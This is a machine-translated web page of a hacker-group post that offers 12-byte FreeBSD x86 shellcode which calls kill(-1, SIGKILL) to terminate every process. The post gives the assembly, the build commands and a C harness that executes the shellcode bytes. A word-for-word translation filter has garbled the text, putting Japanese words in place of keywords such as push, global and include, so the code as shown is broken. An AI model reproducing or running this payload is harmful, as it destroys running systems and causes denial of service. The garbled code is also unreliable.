このページはEtoJ逐語翻訳フィルタによって翻訳生成されました。

翻訳前ページへ


FreeBSD/x86 - kill all 過程s - 12 bytes
            ***(C)oDed bY suN8Hclf***
       DaRk-CodeRs Group 生産/産物s, kid
 [FreeBSD x86 kill all procesess 12 bytes shellcode]


収集する:
nasm -f elf code.asm
ld -e _start -o code code.o

議会 code:
---------------------code.asm-------------------
section .text
全世界の _start

_start:
xor eax, eax
押し進める byte 9 ; SIGKILL
dec eax
押し進める eax    ; -1 (0xffffffff)
inc eax
mov al, 37  ;kill() syscall number, check /usr/src/sys/kern/syscalls.master for 詳細(に述べる)s
押し進める eax
int 0x80
---------------------code.asm-------------------

And C code:
---------------------code.c---------------------
#含む "stdio.h"

char shellcode[]=
"\x31\xc0\x6a\x09\x48\x50\x40\xb0\x25\x50\xcd\x80";

int main()
{
int (*func)();
func=(int (*)())shellcode;
(int)(*func)();
}
---------------------code.c---------------------


Greetz: all DaRk-CodeRs guys, e.wiZz!, doctor
Visit : www.dark-coders.pl